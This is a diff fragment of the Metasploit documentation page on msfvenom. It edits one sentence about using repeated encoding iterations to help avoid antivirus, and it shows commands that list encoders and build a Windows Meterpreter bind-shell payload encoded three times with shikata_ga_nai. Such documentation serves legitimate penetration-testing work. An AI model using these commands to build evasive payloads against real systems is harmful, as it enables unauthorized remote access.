rapid7/metasploit-framework/How-to-use-msfvenom.md

 ./msfvenom -l encoders
 ```

 You can also encode the payload multiple times using the -i flag.
-Sometimes more iterations may help avoiding antivirus but understand encoding isn't really meant to be used a real AV evasion solution:
+Sometimes more iterations may help avoiding antivirus, but know that encoding isn't really meant to be used a real AV evasion solution:

 ```
 ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3